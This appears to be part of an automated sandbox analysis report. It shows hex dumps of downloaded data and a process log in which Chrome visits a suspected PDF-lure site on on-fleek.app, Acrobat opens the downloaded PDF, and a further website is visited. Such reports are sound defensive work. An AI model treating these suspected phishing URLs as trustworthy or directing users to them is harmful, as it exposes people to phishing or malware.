                                              2024-09-27 06:20:26 UTC8000INData Raw: a2 a2 a0 10 50 a7 d0 aa 23 9b 9d 06 c6 6d 4d c5 18 ce 72 8e 86 f5 82 a7 1f d4 d9 e7 99 1a d2 b0 96 e6 5a d2 69 eb 3d 07 00 21 9f 43 a0 00 40 0c 63 64 40 32 cd 2e 63 76 dc 74 73 73 a2 87 55 d6 74 9d c7 f5 b3 61 45 01 5e ce be 1d ed 9e 43 a6 a2 bb 9c fd fd d0 04 56 e5 6b 00 2a 2a 1c fd dd 31 a2 a7 3e 68 64 eb 66 e7 c2 92 cb 9d ad 75 95 9b 9d b7 97 14 ef 97 2f 4f 73 9b 6b e9 75 f7 73 33 96 5e 8d c2 02 91 48 02 88 a8 73 5a f7 46 e3 3b 5b 18 cf ad 04 93 3e 49 2b e6 eb 5c ac e7 e2 ce e8 2e 4a 65 cf 7e 83 7a 9e 43 5e 65 a6 b6 7a 4a b5 35 41 48 65 01 44 06 f3 1d 04 ca de 51 f7 72 eb be 47 4c c7 3d b0 d0 d1 91 eb 56 9d db 39 d2 d8 d2 c0 6d aa a5 cc fb 3a d6 ed b3 13 a7 87 99 ea 1b 38 b9 f7 c0 00 4c cc 7d bb 91 e5 63 b0 99 5c 20 aa 84 54 ae 4b 34 cc c9 d0 96 84 c3
                                              Data Ascii: P#mMrZi=!C@cd@2.cvtssUtaE^CVk**1>hdfu/Oskus3^HsZF;[>I+\.Je~zC^ezJ5AHeDQrGL=V9m:8L}c\ TK4
                                              2024-09-27 06:20:27 UTC8000INData Raw: 44 58 d1 55 14 2e b5 a7 50 82 26 99 3e 5b 52 6d e9 54 cd f3 53 fb 28 72 cd 74 79 b9 92 71 61 85 7d 10 78 69 07 c9 30 f0 9c 6f 04 a3 26 fd 38 cc ab f5 10 33 4b 6a f2 5b 4f 3a b3 66 de d9 28 fa 71 90 30 d8 8d f2 4a cc 3b a7 7c 86 cc 91 76 fa 95 1e 29 d7 61 df 27 a3 ef 16 47 34 91 79 48 dc 23 a4 83 75 39 a7 db 82 18 ca c8 fb 60 2a 40 23 d2 9c 8f f1 9c 1c 0c d4 d7 e6 c6 7f c1 b3 5f ac 9d be a3 ba 9d 8f f8 b4 17 95 d8 06 6a 87 cd 10 cf 6f c7 ec 3c 0f ef f8 69 bf ce 82 30 9d ac b4 ef 62 e0 49 06 d7 1d a3 47 24 0d e3 55 92 3e a7 3e 2b 90 c5 d6 95 23 19 fc 47 6d 40 8a 94 7d 84 51 99 65 55 18 a0 01 db d3 d3 04 4e 40 24 71 0f 2d 78 98 a9 2c ed 1c d6 e6 6e 35 61 db 21 d0 6d ca 79 58 94 26 2e 95 52 ac 65 a3 52 5e ba ed 56 31 e3 63 ec be 44 34 ca 4a 67 91 92 39 a7 fe
                                              Data Ascii: DXU.P&>[RmTS(rtyqa}xi0o&83Kj[O:f(q0J;|v)a'G4yH#u9`*@#_jo<i0bIG$U>>+#Gm@}QeUN@$q-x,n5a!myX&.ReR^V1cD4Jg9
                                              2024-09-27 06:20:27 UTC8000INData Raw: dc 1a d1 81 13 4f 26 f1 e4 53 0b 33 cb 68 f3 cb 31 f4 e6 93 e6 07 f0 85 78 c3 10 f1 b9 da ac b9 27 b6 09 a6 75 0a d2 b6 db 0c 0a 48 5e d8 b5 67 6f 48 ce 2e 9d 29 f5 65 19 a6 57 10 52 8d 07 7c bd 2c 7f 17 28 e6 37 1c fd 55 03 8e 5f ba 3a e6 d0 49 eb c0 98 ab 45 fc ce 25 11 ae dd 78 61 92 c7 52 64 4c 3a 8d 4f d2 cc f9 25 a2 fd 7e 35 db 3e 3a d9 61 ba c4 ab 4f a9 f0 d1 f5 18 13 9e d9 5d 59 ad 57 23 d2 df e5 a4 c9 59 22 64 95 c9 01 5e 16 45 0c 46 35 58 36 e4 ab b6 23 5c 87 c9 15 a3 b0 92 db 3b 3b 40 1c 88 6e 36 db 56 e3 95 62 96 24 da 42 bc 91 07 9b b7 60 3f 61 92 cd 5e 29 a3 67 96 35 c9 75 6d 30 6f f3 d9 b2 06 ea 36 a5 22 04 e9 a5 9e 12 2c 1c 37 c8 75 1a 52 6c 05 85 0d a8 fd 85 3e d5 fb c1 16 6d 96 3f 31 26 5f 1f 36 3c d1 15 4d b6 24 77 bd f9 8f 08 a1 8a 49
                                              Data Ascii: O&S3h1x'uH^goH.)eWR|,(7U_:IE%xaRdL:O%~5>:aO]YW#Y"d^EF5X6#\;;@n6Vb$B`?a^)g5um0o6",7uRl>m?1&_6<M$wI
                                              2024-09-27 06:20:27 UTC8000INData Raw: 30 b0 e4 17 df 35 33 f2 63 19 24 2e 04 6f c7 ca b4 e7 db e9 18 ba 65 96 42 fc a3 01 34 d2 db 0e ba 67 f2 d4 f7 b4 b8 34 a8 f6 07 aa c7 2c d5 48 24 44 8f 91 c7 aa 20 8a 14 d8 16 b1 17 cb f2 a2 93 4d c4 26 4e a1 ed fd 75 df ff 00 8f 04 b1 43 a7 c7 1b c1 18 e7 d4 69 ad 44 5b 6d ff 00 7c db 3b e2 ef b8 f0 b9 f6 87 84 30 45 34 92 73 40 72 ed 38 02 20 55 e2 7e 19 80 90 b0 ec fd 9d bb 6d 9b e0 53 d8 66 96 ad 1f 5b 71 81 9b dd 4e 71 ed ea b8 5e 21 eb 34 59 11 06 34 2a 41 19 78 aa c8 0b 36 c1 1e 11 30 9b 9e 0b 50 92 3b 3e 2f 4b e2 56 52 b6 65 cf 8d fd aa 59 39 13 4c 93 34 82 9c e4 7c 55 af 6d 3a 4c 92 5b b2 23 2f c0 11 93 52 bb 30 03 a3 c7 06 93 67 ff 00 12 65 68 75 18 23 e0 8b 5f 66 a5 a8 39 25 ac 2e 35 0b af 1a 23 59 4d a3 d2 e4 49 63 73 3a 9f 1b a3 e5 8c d4 46
                                              Data Ascii: 053c$.oeB4g4,H$D M&NuCiD[m|;0E4s@r8 U~mSf[qNq^!4Y4*Ax60P;>/KVReY9L4|Um:L[#/R0gehu#_f9%.5#YMIcs:F
                                              2024-09-27 06:20:27 UTC8000INData Raw: b3 f9 89 c2 30 84 d3 12 34 56 a4 e4 e1 fc b9 5a 75 ed c8 e3 c9 52 b1 3d c8 e7 e5 08 be 40 ff 00 6d e8 6d 1c 29 4b eb 59 c7 e5 b1 df f9 db 98 4e 12 d2 89 ae 87 d0 fc c1 78 08 bf c0 0f 77 d7 f0 8b fc 90 62 83 ef 32 09 4c e0 67 65 e5 37 f0 b3 00 f5 0a c9 b1 31 43 81 aa 7b 99 24 61 27 09 f7 27 dd 2c 04 9f 84 4e 65 0f a7 d4 ad 2a 7c 51 31 69 f9 f6 af 6c 29 95 9c d3 5c e8 20 fe a4 ed 8b 1c 5d cc 68 8b 5e b4 8f 2d cd da 3e d0 d1 d0 57 b6 66 1a 61 ee 5a 3d 37 d3 a2 ee 44 8a c4 da ff 00 29 4d 88 d9 9c 41 ca 53 4e 1a 23 b1 2d 6b db 88 15 aa f6 60 99 37 ea 37 11 6c 3a 64 43 a9 02 11 00 8d d6 08 38 09 01 07 4f c5 3a 40 f9 73 76 f7 9a fe 93 9a 23 be 51 9b 27 c8 ea 3e 5e 49 ee aa 87 1f 25 5f 72 ef c2 13 05 3b 66 2d 1a 08 9b a2 14 5d ef 6d fe 11 cf 1d d8 f6 fe 15 bd a7
                                              Data Ascii: 04VZuR=@mm)KYNxwb2Lge71C{$a'',Ne*|Q1il)\ ]h^->WfaZ=7D)MASN#-k`77l:dC8O:@sv#Q'>^I%_r;f-]m
                                              2024-09-27 06:20:27 UTC8000INData Raw: c4 bc 92 64 f2 4c 71 06 99 51 6c b5 e2 24 e5 c9 63 3c 3e 25 31 b0 e6 cd ab ff 00 68 5c a3 aa 2d 14 99 a1 ad 61 11 7d 91 31 ad a9 5a 1f 26 a7 71 13 1d 94 5a bb d1 72 f5 56 4f 25 c3 be 47 c2 16 cc 00 64 67 96 f2 45 41 8e 89 e0 59 13 70 ed c7 7c 15 c3 f1 53 aa fd de 89 b1 24 36 ec 71 85 ec da ac 9d ce a8 aa 8f 73 5a f5 47 b1 69 0e 5a 85 cc 28 f2 dd 3e 48 09 e0 da 19 ae 95 a2 ff 00 ed 03 ca 10 a4 b3 e1 3c a5 0a d2 6e cd 6b 92 37 9c 80 c5 35 90 3b d4 82 1d f9 6a bd ab 7a a0 f1 47 0a 28 22 c0 6c 41 bb c1 54 dd 35 3c e2 f5 ed 0f 88 9a ef 71 89 ed c5 39 93 31 15 9d d9 4f aa 75 fc f7 b9 ad 35 38 ad 6e a2 70 00 34 3a a7 41 09 ff 00 19 cb 4e cd c1 a1 d4 d1 00 f7 98 8b 94 b7 e3 75 d1 c5 5e 4a 4c 11 b4 8a 76 2f df e8 b3 15 f1 6a ef df fc c9 36 2c b5 93 3c 59 e6 bf 30
                                              Data Ascii: dLqQl$c<>%1h\-a}1Z&qZrVO%GdgEAYp|S$6qsZGiZ(>H<nk75;jzG("lAT5<q91Ou58np4:ANu^JLv/j6,<Y0
                                              2024-09-27 06:20:27 UTC8000INData Raw: ff 00 88 3d 83 fd db b1 02 88 0f a1 27 10 06 83 b1 95 2b 1d 2a 54 ae 8c 25 4e 3a 57 d1 cc b8 0d ad 66 5c ab 39 46 ad ac 9d 39 e9 5f 55 4a fa 69 fa 52 57 d7 5f 4d 74 ae b5 ff 00 91 d0 89 45 9b eb d9 05 90 4f 39 cf c2 8e f9 61 e9 cf d0 f5 e7 ff 00 37 4f a8 74 ae b5 d2 be 9a ff 00 c0 25 4a 95 f5 54 42 20 b1 32 4b d0 b5 a6 30 86 92 30 c7 82 69 22 b6 31 4f fa a8 c3 ca c6 ff 00 ec 8c 27 5a 89 2b a5 74 e7 a5 7d 35 0b 1b d2 45 96 e9 bf fc 2b ff 00 27 af 3f fb bf fb e0 bc 5c 44 55 37 24 16 41 13 cb 0f 4a aa e9 ab 76 79 6e 69 60 28 8e fa d7 fe 15 d2 a7 32 ba 68 fa 95 f5 73 d6 b3 d7 89 5d 2a 57 4a 95 f4 67 ad 4a eb 51 d6 b7 f1 12 70 7e 61 a8 56 cd 5c 67 98 35 56 75 4e f9 14 17 a8 98 8f f2 42 74 25 4a 95 8e 86 65 4a 81 2a 54 aa 8c a5 c7 47 72 a5 7d 15 f4 93 5d 68 eb
                                              Data Ascii: ='+*T%N:Wf\9F9_UJiRW_MtEO9a7Ot%JTB 2K00i"1O'Z+t}5E+'?\DU7$AJvyni`(2hs]*WJgJQp~aV\g5VuNBt%JeJ*TGr}]h
                                              2024-09-27 06:20:27 UTC8000INData Raw: bb 2d 88 cc e0 2a fb 15 e5 0b 3c 2f 4f bc f6 89 b4 fd e3 6a 2f 6c 3f 98 b0 0f 87 f2 43 55 4f 05 7f b2 01 c2 4c 81 a7 c6 c9 b6 39 5f dd b2 52 53 fc cc ca 25 c5 ef f4 0d ff 00 86 90 10 36 70 83 fb 25 6a c5 80 fd 2e 25 41 06 22 56 b2 39 9b b0 b3 43 f9 42 e5 76 fe 4a a5 c3 7e 14 85 0d 67 86 1e 94 57 b2 17 60 b7 90 cb 29 46 b5 4a c3 7e f2 83 d3 cc d3 60 f8 e2 a5 66 8b 98 22 88 9c ea 6e 8c 05 b6 89 90 9e 85 ed 0a ea 75 55 a5 b2 1a e8 e9 00 5b b2 06 82 b4 6c 1d 2e 2a a9 3b 7f b2 48 c0 a7 c5 8e 63 dc 34 5d 8f be 25 0f b0 c2 9c 76 23 df 89 27 dd 2a 87 2c d1 91 fe 11 f4 ec e8 08 bb ae f0 5a 16 d4 af 25 20 0d f9 24 b0 22 0c c1 87 ff 00 b2 9f a3 b7 01 47 27 29 51 ee c4 1a cf fb 4b 78 c3 c4 81 25 4a 82 3a 5d a5 2c 65 a4 cf b4 47 15 68 88 e0 fa 82 80 7b 4a 95 2a 54 a8
                                              Data Ascii: -*</Oj/l?CUOL9_RS%6p%j.%A"V9CBvJ~gW`)FJ~`f"nuU[l.*;Hc4]%v#'*,Z% $"G')QKx%J:],eGh{J*T
                                              2024-09-27 06:20:27 UTC8000INData Raw: 8d 05 de 82 a9 92 f3 62 3a 30 f1 41 34 24 77 0e ca e7 c0 8a f1 63 35 fc 61 32 d2 51 c6 5b 23 19 b9 56 e5 af 7b 4e 20 a1 dc 49 41 de 0b f0 9b d7 52 a8 5f b2 af ca 6b 5a b3 8f 41 2c 77 82 13 73 91 6c ca 76 bb b1 f6 e9 96 c7 82 b4 c4 08 39 8f 4b e6 0c e6 96 16 ae 7a 8c e8 1c ae 87 2a 11 8f 01 07 18 78 a4 5d 4a a2 1a ce fa 65 f0 42 95 21 66 8b f8 18 20 5b b4 6b fa 40 02 09 a5 74 32 84 58 07 2f c6 ff 00 33 73 07 2d 91 f2 cf c0 81 ed 08 0c 19 65 5c 17 0c b0 4e 7b 0f 53 38 15 5b 42 d9 0b eb 53 e6 12 69 e3 ee 04 c4 bb c0 82 87 02 46 42 57 4a 95 2b 32 a0 4a 95 2a 57 7e 8a 22 54 ac 74 7a 4a 95 2a 54 a9 ee 25 0b 74 15 49 77 83 3d 15 2a 56 65 4a cc a8 05 5a d0 6f 11 c7 c4 29 f9 cb f0 88 c7 62 d8 73 88 10 dd 73 46 72 7e 98 1c 17 23 b0 35 e7 18 01 d4 aa 64 97 b9 55 d3
                                              Data Ascii: b:0A4$wc5a2Q[#V{N IAR_kZA,wslv9Kz*x]JeB!f [k@t2X/3s-e\N{S8[BSiFBWJ+2J*W~"TtzJ*T%tIw=*VeJZo)bssFr~#5dU


                                              Click to jump to process

                                              Click to jump to process

                                              Click to dive into process behavior distribution

                                              Click to jump to process

                                              Target ID:0
                                              Start time:02:17:50
                                              Start date:27/09/2024
                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                              Imagebase:0x7ff76e190000
                                              File size:3'242'272 bytes
                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              Target ID:2
                                              Start time:02:17:53
                                              Start date:27/09/2024
                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2272 --field-trial-handle=2192,i,1005448200650348598,15467487990718780475,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                              Imagebase:0x7ff76e190000
                                              File size:3'242'272 bytes
                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              Target ID:3
                                              Start time:02:17:55
                                              Start date:27/09/2024
                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://pdf-online.on-fleek.app/"
                                              Imagebase:0x7ff76e190000
                                              File size:3'242'272 bytes
                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              Target ID:8
                                              Start time:02:19:13
                                              Start date:27/09/2024
                                              Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\downloaded.pdf"
                                              Imagebase:0x7ff6bc1b0000
                                              File size:5'641'176 bytes
                                              MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              Target ID:9
                                              Start time:02:19:13
                                              Start date:27/09/2024
                                              Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                              Imagebase:0x7ff74bb60000
                                              File size:3'581'912 bytes
                                              MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              Target ID:10
                                              Start time:02:19:14
                                              Start date:27/09/2024
                                              Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2108 --field-trial-handle=1716,i,16758670913067445225,6828871122202533892,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                              Imagebase:0x7ff74bb60000
                                              File size:3'581'912 bytes
                                              MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              Target ID:13
                                              Start time:02:19:38
                                              Start date:27/09/2024
                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "https://www.citydiamondcontracting.com/contact"
                                              Imagebase:0x7ff76e190000
                                              File size:3'242'272 bytes
                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:false

                                              Target ID:14
                                              Start time:02:19:39
                                              Start date:27/09/2024
                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2300 --field-trial-handle=1908,i,1316434060209903299,14506947510515019219,262144 /prefetch:8
                                              Imagebase:0x7ff76e190000
                                              File size:3'242'272 bytes
                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:false

                                              Target ID:15
                                              Start time:02:20:50
                                              Start date:27/09/2024
                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6764 --field-trial-handle=1908,i,1316434060209903299,14506947510515019219,262144 /prefetch:8
                                              Imagebase:0x7ff76e190000
                                              File size:3'242'272 bytes
                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:false

                                              Target ID:16
                                              Start time:02:20:50
                                              Start date:27/09/2024
                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6700 --field-trial-handle=1908,i,1316434060209903299,14506947510515019219,262144 /prefetch:8
                                              Imagebase:0x7ff76e190000
                                              File size:3'242'272 bytes
                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              No disassembly